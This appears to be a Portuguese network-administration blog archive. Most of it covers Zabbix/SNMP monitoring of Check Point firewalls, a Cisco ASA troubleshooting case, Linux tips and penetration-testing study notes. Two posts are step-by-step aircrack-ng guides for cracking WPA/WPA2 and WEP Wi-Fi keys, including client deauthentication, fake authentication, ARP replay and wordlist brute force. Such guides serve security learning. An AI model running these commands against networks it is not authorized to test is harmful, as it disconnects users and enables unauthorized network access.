                                    <sortorder>0</sortorder>
                                    <drawtype>0</drawtype>
                                    <color>00C800</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>2</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>hrStorageSizeInBytes[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>0</drawtype>
                                    <color>C80000</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>hrStorageUsedInBytes[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>            
			</discovery_rules>
            <macros/>
			<templates/>
            <screens>
                <screen>
                    <name>Check Point Screen</name>
                    <hsize>2</hsize>
                    <vsize>3</vsize>
                    <screen_items>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>0</x>
                            <y>0</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Processor usage</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>1</x>
                            <y>0</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Connections</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>1</x>
                            <y>1</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Response time</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                        <screen_item>
                            <resourcetype>0</resourcetype>
                            <width>500</width>
                            <height>100</height>
                            <x>0</x>
                            <y>2</y>
                            <colspan>1</colspan>
                            <rowspan>1</rowspan>
                            <elements>0</elements>
                            <valign>0</valign>
                            <halign>0</halign>
                            <style>0</style>
                            <url/>
                            <dynamic>0</dynamic>
                            <sort_triggers>0</sort_triggers>
                            <resource>
                                <name>Memory usage</name>
                                <host>Template CheckPoint SNMP</host>
                            </resource>
                        </screen_item>
                    </screen_items>
                </screen>
            </screens>
        </template>
    </templates>
    <triggers>
        <trigger>
            <expression>{Template CheckPoint SNMP:icmppingsec.last(0)}&gt;1</expression>
            <name>ICMP ping response too slow from {HOST.NAME}</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description>Host reponses to ICMP ping but too slowly. Might be CPU load on host or network traffic causing this.</description>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 50 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 70</expression>
            <name>Processor usage above 50%</name>
            <url/>
            <status>0</status>
            <priority>1</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 70 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 90</expression>
            <name>Processor usage above 70%</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &gt; 90 &amp; ({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) &lt; 100</expression>
            <name>Processor usage above 90%</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>({Template CheckPoint SNMP:procSysTime.last(20)}+{Template CheckPoint SNMP:procUsrTime.last(20)}) = 100</expression>
            <name>Processor usage on 100%</name>
            <url/>
            <status>0</status>
            <priority>4</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:net.tcp.service[ssh].last(0)}=0</expression>
            <name>SSH service is down on {HOST.NAME}</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:haWorkMode.diff(0)}=1 | {Template CheckPoint SNMP:haState.diff(0)}=1</expression>
            <name>{HOSTNAME} HA State Change</name>
            <url/>
            <status>0</status>
            <priority>2</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:haState.str(active)}=0 &amp; {Template CheckPoint SNMP:haState.str(standby)}=0</expression>
            <name>{HOSTNAME} HA State not Active/Standby</name>
            <url/>
            <status>0</status>
            <priority>3</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
        <trigger>
            <expression>{Template CheckPoint SNMP:fwInstallTime.diff(0)}=1</expression>
            <name>{HOSTNAME} Policy installed</name>
            <url/>
            <status>0</status>
            <priority>1</priority>
            <description/>
            <type>0</type>
            <dependencies/>
        </trigger>
    </triggers>
    <graphs>
        <graph>
            <name>Connections</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>fwNumConn</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Memory usage</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>
                <host>Template CheckPoint SNMP</host>
                <key>memTotalVirtual64</key>
            </ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>1</sortorder>
                    <drawtype>1</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>memActiveReal64</key>
                    </item>
                </graph_item>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>1</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>memActiveVirtual64</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Processor usage</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>1</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>1</sortorder>
                    <drawtype>0</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>procSysTime</key>
                    </item>
                </graph_item>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>00C800</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>procUsrTime</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
        <graph>
            <name>Response time</name>
            <width>900</width>
            <height>200</height>
            <yaxismin>0.0000</yaxismin>
            <yaxismax>100.0000</yaxismax>
            <show_work_period>1</show_work_period>
            <show_triggers>1</show_triggers>
            <type>0</type>
            <show_legend>1</show_legend>
            <show_3d>0</show_3d>
            <percent_left>0.0000</percent_left>
            <percent_right>0.0000</percent_right>
            <ymin_type_1>0</ymin_type_1>
            <ymax_type_1>0</ymax_type_1>
            <ymin_item_1>0</ymin_item_1>
            <ymax_item_1>0</ymax_item_1>
            <graph_items>
                <graph_item>
                    <sortorder>0</sortorder>
                    <drawtype>0</drawtype>
                    <color>C80000</color>
                    <yaxisside>0</yaxisside>
                    <calc_fnc>2</calc_fnc>
                    <type>0</type>
                    <item>
                        <host>Template CheckPoint SNMP</host>
                        <key>icmppingsec</key>
                    </item>
                </graph_item>
            </graph_items>
        </graph>
    </graphs>
</zabbix_export>

Abaixo irei detalhar os OIDs mais interessantes, não necessariamente coletei todos no template, mas caso surja alguma necessidade especial podemos facilmente consultar os principais itens abaixo e estender o template disponível para download quando necessário.

# UC Davis MIB - UCD-SNMP-MIB
# Os itens comentados são apenas para entender o caminho utilizado, facilitando
# caso esteja buscando algum outro item próximo
# ucdavis		1.3.6.1.4.1.2021
# memory		1.3.6.1.4.1.2021.4
# dskTable	    1.3.6.1.4.1.2021.9
# systemStats	1.3.6.1.4.1.2021.11

# CPU [%] - UCD-SNMP-MIB
ssCpuUser		1.3.6.1.4.1.2021.11.9		! Processor user time
ssCpuSystem		1.3.6.1.4.1.2021.11.10		! Processor system time
ssCpuIdle		1.3.6.1.4.1.2021.11.11		! Processor idle time

# Memoria [kbytes] - UCD-SNMP-MIB
memTotalSwap	1.3.6.1.4.1.2021.4.3		! Total swap space
memAvailSwap	1.3.6.1.4.1.2021.4.4		! Free swap space
memTotalReal	1.3.6.1.4.1.2021.4.5		! Total real memory
memAvailReal	1.3.6.1.4.1.2021.4.6		! Available real memory

# Interfaces - IF-MIB
# Para as interfaces vamos utilizar o template já definido no Zabbix
# pois há a necessidade do discovery devido ao número de interfaces ser variável
ifIndex				1.3.6.1.2.1.2.2.1.1
ifDescr				1.3.6.1.2.1.2.2.1.2
ifType				1.3.6.1.2.1.2.2.1.3
ifMtu				1.3.6.1.2.1.2.2.1.4
ifSpeed				1.3.6.1.2.1.2.2.1.5
ifPhysAddress		1.3.6.1.2.1.2.2.1.6
ifAdminStatus		1.3.6.1.2.1.2.2.1.7
ifOperStatus		1.3.6.1.2.1.2.2.1.8
ifLastChange		1.3.6.1.2.1.2.2.1.9
ifInOctets			1.3.6.1.2.1.2.2.1.10
ifInUcastPkts		1.3.6.1.2.1.2.2.1.11
ifInNUcastPkts		1.3.6.1.2.1.2.2.1.12
ifInDiscards		1.3.6.1.2.1.2.2.1.13
ifInErrors			1.3.6.1.2.1.2.2.1.14
ifInUnknownProtos	1.3.6.1.2.1.2.2.1.15
ifOutOctets			1.3.6.1.2.1.2.2.1.16
ifOutDiscards		1.3.6.1.2.1.2.2.1.19
ifOutErrors			1.3.6.1.2.1.2.2.1.20

# Disco - UCD-SNMP-MIB
dskIndex	    1.3.6.1.4.1.2021.9.1.1
dskPath	        1.3.6.1.4.1.2021.9.1.2
dskDevice	    1.3.6.1.4.1.2021.9.1.3
dskMinimum	    1.3.6.1.4.1.2021.9.1.4
dskMinPercent	1.3.6.1.4.1.2021.9.1.5
dskTotal	    1.3.6.1.4.1.2021.9.1.6
dskAvail	    1.3.6.1.4.1.2021.9.1.7
dskUsed	        1.3.6.1.4.1.2021.9.1.8
dskPercent	    1.3.6.1.4.1.2021.9.1.9
dskPercentNode	1.3.6.1.4.1.2021.9.1.10
dskErrorFlag	1.3.6.1.4.1.2021.9.1.100
dskErrorMsg	    1.3.6.1.4.1.2021.9.1.101

# HOST-RESOURCES-MIB
# Não use o sysUpTimeInstance (1.3.6.1.2.1.1.3.0) pois esse é o uptime do
# daemon SNMP, não necessariamente do hardware
# Uptime [timeticks, 0.01s]
hrSystemUptime	1.3.6.1.2.1.25.1.1

Algumas métricas você também pode coletar diretamente da MIB da Check Point, como CPU. Existem algumas métricas exclusivas nessa MIB como o número de conexões estabelecidas.

# Check Point MIB
# checkpoint	    1.3.6.1.4.1.2620
# products 		    1.3.6.1.4.1.2620.1
# fw			    1.3.6.1.4.1.2620.1.1
# fwPolicyStat	    1.3.6.1.4.1.2620.1.1.25
# fwIfTable		    1.3.6.1.4.1.2620.1.1.25.5		! Interfaces
# fwIfEntry		    1.3.6.1.4.1.2620.1.1.25.5.1		! Interfaces
# svn			    1.3.6.1.4.1.2620.1.6
# svnPerf		    1.3.6.1.4.1.2620.1.6.7
# svnProc		    1.3.6.1.4.1.2620.1.6.7.2		! CPU
# svnMem64		    1.3.6.1.4.1.2620.1.6.7.4		! Memória

# CPU [%]
procUsrTime		    1.3.6.1.4.1.2620.1.6.7.2.1		! Processor user time
procSysTime		    1.3.6.1.4.1.2620.1.6.7.2.2		! Processor system time
procIdleTime		1.3.6.1.4.1.2620.1.6.7.2.3		! Processor idle time
procUsage		    1.3.6.1.4.1.2620.1.6.7.2.4		! Processor usage

# Memória [bytes]
memTotalVirtual64	1.3.6.1.4.1.2620.1.6.7.4.1		! Total memory (real + swap)
memActiveVirtual64	1.3.6.1.4.1.2620.1.6.7.4.2		! Active total memory
memTotalReal64		1.3.6.1.4.1.2620.1.6.7.4.3		! Total real memory
memActiveReal64		1.3.6.1.4.1.2620.1.6.7.4.4		! Active real memory
memFreeReal64		1.3.6.1.4.1.2620.1.6.7.4.5		! Available real memory

# Interfaces
fwIfIndex	        1.3.6.1.4.1.2620.1.1.25.5.1.1
fwIfName	        1.3.6.1.4.1.2620.1.1.25.5.1.2
fwAcceptPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.5
fwAcceptPcktsOut	1.3.6.1.4.1.2620.1.1.25.5.1.6
fwAcceptBytesIn	    1.3.6.1.4.1.2620.1.1.25.5.1.7
fwAcceptBytesOut	1.3.6.1.4.1.2620.1.1.25.5.1.8
fwDropPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.9
fwDropPcktsOut	    1.3.6.1.4.1.2620.1.1.25.5.1.10
fwRejectPcktsIn	    1.3.6.1.4.1.2620.1.1.25.5.1.11
fwRejectPcktsOut    1.3.6.1.4.1.2620.1.1.25.5.1.12
fwLogIn	            1.3.6.1.4.1.2620.1.1.25.5.1.13
fwLogOut	        1.3.6.1.4.1.2620.1.1.25.5.1.14

# Connections
fwNumConn		    1.3.6.1.4.1.2620.1.1.25.3		! Current connections
fwPeakNumConn	    1.3.6.1.4.1.2620.1.1.25.4		! Peak number of connections

# VPN
# É possivel validar o valor do OID cpvCurrEspSAsIn com
# o comando "fw tab -t userc_users -s"
cpvCurrEspSAsIn	    1.3.6.1.4.1.2620.1.2.5.2.1      ! Remote Access User Count

# High Availability
haState				1.3.6.1.4.1.2620.1.5.6			! High Availability State
haWorkMode			1.3.6.1.4.1.2620.1.5.11			! High Availability Mode

# Check Point General Stats
svnVersion			1.3.6.1.4.1.2620.1.6.4.1		! Product Version
fwModuleState		1.3.6.1.4.1.2620.1.1.1			! Firewall Module State
fwProduct			1.3.6.1.4.1.2620.1.1.10			! Product name
fwInstallTime		1.3.6.1.4.1.2620.1.1.25.2		! Firewall Policy Install Time
osName				1.3.6.1.4.1.2620.1.6.5.1		! OS name

Após definir as OIDs mais importantes para coleta, criei um template para Check Point (com SO Secure Platform), usei trechos das SNMPs já existentes no Zabbix mas elas estão incorporadas no template, de forma que o mesmo é totalmente independente (não tem link com os outros templates).

Referências
UCD-SNMP-MIB
IF-MIB
HOST-RESOURCES-MIB
CHECKPOINT-MIB
Check Point Products SNMP MIB
SecurePlatform OS SNMP MIB
SNMP OID for the number Remote Access users (SR/SC/EPC/SNX) currently connected to a VPN-1 gateway
Linux OID’s for CPU,Memory and Disk Statistics
Zabbix 2 CheckPoint SNMP template
Monitoring Checkpoint Firewalls with SNMP
Check Point Firewall Metrics
Oracle® Enterprise Manager System Monitoring Plug-in Metric Reference Manual for Network Management
In search of Firewalls KPIs

26/02/2013

Monitorando Check Point com Zabbix – Parte 1

Filed under: checkpoint,monitoring — drak @ 10:14 AM

Embora pareça ser algo trivial, a monitoração de um firewall CheckPoint apresenta algumas particularidades interessantes, além disso também é importante notar que a tarefa de customização de uma ferramenta de monitoração (nesse caso o Zabbix) também nem sempre é tão intuitiva quanto podemos pensar à primeira vista.

Este artigo pretende orientar a comunidade e prover algumas recomendações sobre como monitorar adequadamente seu ambiente de firewall CheckPoint, não é escopo desse post a instalação do Zabbix mas sim a configuração do SNMP no CheckPoint e a configuração da coleta de dados e exibição de gráficos no Zabbix já instalado, porém é importante lembrar de habilitar o SNMP durante a instalação/compilação do Zabbix.

Irei separar o artigo em duas partes, nessa primeira etapa iremos ativar o SNMP e na segunda parte configuraremos a coleta no Zabbix.

# Inicialmente vamos configurar os parâmetros SNMP do Sistema Operacional (splat)
# Verifica se o serviço já está rodando
ps aux | grep snmp
netstat -an | egrep ":161|:260"
# Se necessário desabilita o mesmo para alteração
snmp service disable
# Altera o arquivo de configuração para sua community personalizada
# Importante remover a community padrão "public"
vi  /etc/snmp/snmpd.users.conf
rocommunity D3adpack3tsR3AD
# As vezes é necessário incluir a linha abaixo para que as requisições para o SNMP da Check Point funcionem
proxy -v 1 -c public localhost:260 .1.3.6.1.4.1.2620
# Define os servidores de monitoração que recebrão as traps
vi /etc/snmp/snmpd.conf
syslocation	"Brazil, MA, DC Amazonas, Rack B22"
syscontact	"my_group_email@company.com"
trap2sink 192.0.2.10 D3adpack3tsR3AD

# Agora vamos configurar os parâmetros de SNMP da aplicação (firewall CheckPoint)
# Altere os valores entre parênteses conforme exemplo
vi $FWDIR/conf/snmp.C
(
        : (
                : (system.sysName.0
                        :value (MY_FIREWALL_HOSTNAME)
                )
                : (system.sysDescr.0
                        :value ("Linux i386 vEL.3.0 Check Point FireWall-1")
                )
                : (system.sysContact.0
                        :value ("my_group_email@company.com")
                )
                : (system.sysLocation.0
                        :value ("Brazil, MA, DC Amazonas, Rack B22")
                )
                : (system.sysObjectID.0
                        :value (".1.3.6.1.4.1.2620.1.1")
                )
        )
        :snmp_community (
                :read (D3adpack3tsR3AD)
                :write ()
        )
)

# Habilita o serviço
snmp service enable
# Testes
# Obtem o hostname da SNMP do SO
snmpwalk -c D3adpack3tsR3AD -v 2c localhost SNMPv2-MIB::sysName.0
# Testa a SNMP do Check Point
snmpwalk -c D3adpack3tsR3AD -v 2c localhost 1.3.6.1.4.1.2620
# Caso não funcione mate o processo cpsnmpd que está rodando e inicie-o novamente
cpsnmpd -p 260
# Testa remotamente, a partir do Zabbix
snmpwalk -c D3adpack3tsR3AD -v 2c YOUR_FIREWALL_REMOTE_IP SNMPv2-MIB::sysName.0
# Se necessario, restarte o serviço
service snmpd restart

A partir desse ponto já é possível incluir o equipamento em alguma ferramenta que realize a coleta de informações via SNPM como Nagios, SolarWinds ou Zabbix. No próximo artigo iremos criar o template, o host, associá-los e criar os screens mais relevantes.

Referências
How to enable SNMP on SecurePlatform
How to Configure SNMP on SecurePlatform
Machine with Check Point software responds with ‘No Such Object available on this agent at this OID’ to Check Point SNMP OID, but responds correctly to generic SNMP OID
Where to find Check Point MIB and SecurePlatform MIB information
SNMP on SPLAT – any HOWTO?
SNMP configuration in Checkpoint Secureplatform
Configuring system monitoring with SNMP for Check Point security gateways and security management

11/11/2012

Wireless Fun – Crackeando WPA/WPA2

Filed under: segurança,wireless — drak @ 3:36 PM

Mais um post da série Wireless Fun! Agora vamos ver como executar um simples ataque de brute-force em uma rede WPA ou WPA2 que usa autenticação por pre-shared key.

O objetivo desse post é ser um guia rápido, caso você não entenda o que está fazendo sugiro que leia as referências.

Esse post foi testado com o seguinte sistema:

Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali15 i686 GNU/Linux

Variáveis utilizadas

Interface = <INTERFACE>
Rede = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
CLIENT_MAC = <11:22:33:44:55:66>
Arquivo de captura = <FILENAME_CAPTURA>

Inicie a interface em modo monitor

airomon-ng start <INTERFACE>

Inicie o airodump-ng para verificar o que tem por perto

airodump-ng mon0

Escolha a rede alvo e faça os filtros adequados pelo SSID e canal no airodump

airodump-ng --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Espere até ver uma mensagem parecida com “WPA handshake: 00:AA:BB:CC:DD:FF” na primeira linha do airodump-ng, caso ela não apareça e existirem clientes conectados você pode forçar um cliente a se reautenticar (lembre-se que isso fará com que ele seja desconectado, geralmente ele tentará se conectar novamente sozinho e nesse momento você conseguirá capturar o 4-way handshake):

aireplay-ng --deauth 1 -a <00:AA:BB:CC:DD:FF> -c <11:22:33:44:55:66> mon0

Depois disso você deve ver a mensagem “WPA handshake: 00:AA:BB:CC:DD:FF”.

Depois de ter capturado o 4-way handshake podemos começar o brute-force offline da PSK, para isso você precisa de uma wordlist, vamos usar uma wordlist padrão que já existe no kali, porém filtrando somente as senhas que nos interessam:

cd /usr/share/wordlists/
gunzip rockyou.txt.gz
grep -E '^.{8,63}$' < rockyou.txt >> rockyou_wpa_passwd.txt
aircrack-ng -w rockyou_wpa_passwd.txt -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Espere e comemore 🙂 (ou não…)

O ponto mais crítico nesse método é possuir uma boa wordlist, existem várias disponíveis publicamente. É importante lembrar também que a PSK deve ter entre 8 e 63 caracteres, para filtrar sua wordlist por esse critério, seguem dois comandos possíveis (um já utilizado acima):

awk '{ if ((length($0) > 7) && (length($0) < 64)){ print $0 }}' inputfile
grep -E '^.{8,63}$' < inputfile >> outputfile

Referências
Tutorial: How to Crack WPA/WPA2
Tutorial: WPA Packet Capture Explained
aircrack-ng: How to crack WEP with no clients
aircrack-ng, seção “other tips”

09/10/2012

Wireless Fun – Crackeando WEP

Filed under: segurança,wireless — drak @ 10:58 PM

Todo mundo sabe, todo mundo já fez mas como nunca achei um guia de referência rápido, segue abaixo o que fazer para conseguir crackear uma rede Wi-Fi que está utilizando criptografia WEP (e se a sua ainda estiver assim, troque agora!)

O objetivo desse post é ser um guia rápido, caso você não entenda o que está fazendo sugiro que leia as referências.

Variáveis utilizadas

Interface = <INTERFACE>
Rede = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
MAC SUA PLACA DE REDE = <11:22:33:44:55:66>
Arquivo de captura = <FILENAME_CAPTURA>

Crackear WEP – Etapas comuns

Inicie a interface em modo monitor

airomon-ng start <INTERFACE>

Inicie o airodump-ng para verificar o que tem por perto

airodump-ng mon0

Escolha a rede alvo e faça os filtros adequados pela criptografia, SSID e canal no airodump

airodump-ng --encrypt WEP --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Crackear WEP – Com clientes ativos na rede

Teste que você consegue injetar pacotes e use o aireplay para gerar tráfego

<!-- Teste de injeção -->
aireplay-ng --test mon0
<!-- Associação com o AP -->
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0
<!-- Associação usando um MAC diferente da sua placa de rede wireless -->
aireplay-ng --fakeauth 0 -h <11:22:33:44:55:66> -a <00:AA:BB:CC:DD:FF> -e  mon0
<!-- Geração do tráfego, deve estar associado -->
aireplay-ng --arpreplay -b <00:AA:BB:CC:DD:FF> mon0

Inicie o aircrack-ng para a análise dos pacotes capturados

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Crackear WEP – Sem clientes

<!-- Associar -->
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0

Obter o PRGA usando fragmentação ou chopchop

aireplay-ng --fragment -b <00:AA:BB:CC:DD:FF> mon0
aireplay-ng --chopchop -b <00:AA:BB:CC:DD:FF> mon0

Gere um ARP request com o PRGA obtido anteriormente

packetforge-ng --arp -a <00:AA:BB:CC:DD:FF> -k 255.255.255.255 -l 255.255.255.255 -y fragment-dddd-nnnnnn.xor -h <11:22:33:44:55:66> -w fake_arp_request.cap

Com o pacote gerado, faça o replay dele

aireplay-ng --interactive -r fake_arp_request.cap mon0

Ou, ao invés disso tudo acima, simplesmente:

aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b <00:AA:BB:CC:DD:FF> mon0

Inicie o aircrack-ng para a análise dos pacotes capturados

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Update 11/11: Corrigi a sintaxe de alguns comandos

Referências
aircrack-ng: How to crack WEP with no clients

11/07/2012

TCP RST enviado pelo firewall

Filed under: cisco,troubleshooting — drak @ 7:00 PM

Caso: Capture no Cisco ASA (caixa grande, 5550) indicava intermitência na comunicação de certos tráfegos, ora estabelecia conexão ora a mesma recebia um TCP Reset. Foi inicialmente verificado as métricas de performance do equipamento: CPU e memória normais, tráfego na interface também normal.

Foi verificado o detalhe do tráfego ponto a ponto, originava de um determinado host da rede interna, chegava no firewall e era enviada para um VIP (Load Balancer F5 BigIP). Foi montada um tcpdump no BigIP para determinar qual dos servidores da farm estava enviando o TCP Reset e qual não foi a surpresa quando na captura do BigIP não foi encontrado nenhum pacote RST sendo enviado.

Tráfego passando normalmente

Tráfego sendo rejeitado com TCP RST

Surgiu a questão, porque o firewall estava enviando os resets (já que não havia outros elementos que poderiam fazer isso na topologia) ?

Foi feito nova revisão do firewall, verificou-se a configuração da ACL, existência de service policy (não havia) e outros parâmetros de segurança que poderiam limitar conexões como threath-detection, nada relevante foi encontrado.

Foi passado a informação de que uma nova aplicação relacionada ao SAP havia entrado em produção há pouco tempo, o que poderia ter causado algum impacto de performance no firewall, porém parâmetros como CPU e memória já haviam sido analisados e não estavam nem perto de 100%, foi quando analisando o número de conexões estabelecidas (sh conn count) notamos que o número era estranhamente “redondo”, 650001. Imediatamente suspeitamos que o número máximo de sessões do equipamento havia sido atingido, ao validar o número de sessões simultâneas que o equipamento suporta no datasheet do fabricante finalmente validamos a suspeita, entendendo que o comportamento observado ocorria justamente por esse limite ter sido alcançado.

Comunicamos ao time da aplicação o problema encontrado, fizemos uma análise de sessões (inserir link) para determinar os IPs mais ofensivos (do ponto de vista de número de sessões criadas) e passamos essa informação a eles, durante essa análise notamos que o maior tráfego era de servidores de backup fazendo consultas DNS, descobrimos que as máquinas de backup estavam rodando o software Data Protector que em sua configuração padrão realiza uma consulta no DNS reverso do IP do servidor que está sendo feito o backup, o motivo do número excessivo de sessões foi que a zona de DNS reversa não estava configurada e portanto o Data Protector ficava continuamente tentando efetuar essa consulta ao DNS, que nunca era resolvida com sucesso, causando um efeito similar a o de uma ataque DoS e estourando o número de sessões utilizadas no firewall.

Referências
Cisco ASA 5500 Series Adaptive Security Appliances

26/06/2012

Export de variáveis na inicialização em sistemas Linux

Filed under: dicas e truques — drak @ 3:39 PM

É comum em certos ambientes que seja necessário incluir algumas variáveis de ambiente durante a inicialização, como exemplo iremos utilizar o export para configuração de proxy:

export http_proxy=http://proxy.dominio.com:8080

Para fazer export de variáveis quando o sistema subir, alterar os seguintes arquivos.

/etc/rc.local (Red Hat based)
/etc/rc.conf (BSD based)

Configurações que sobem quando o usuário loga

/etc/profile (shell bash para todos os usuários)
/home/usuario/.bash_profile (shell bash somente para o usuário específico, utilizado para export de variáveis)
/home/usuario/.bashrc (Para execução de programas)

Referências
Running Additional Programs at Boot Time

21/06/2012

GWAPT Study Notes

Filed under: certificação,segurança — drak @ 11:45 PM

Ano passado fiz a certificação GWAPT (GIAC Web Application Penetration Tester), uma certificação oferecida pela SANS/GIAC. Compartilho abaixo o guia de estudo que elaborei durante o processo de estudo para a certificação, que é baseado no ótimo curso da própria SANS.

Recon

  • Whois, DNS (dig, nslookup, fierce)
  • Google hacking, newsgroups, mailing, social nets (gpscan, reconnoiter)
  • Maltego

Mapping

  • Port scan, service versioning (nmap)
  • Spidering (webscarab, paros, burp, wget, cewl)
  • Application flowchart (dirbuster)
  • Relationship Analysis (maltego)
  • Discover hidden pages (nikto)
  • Session Analysis (webscarab, burp)

Discovery

  • Automated scanner (grendel, w3af, burp)
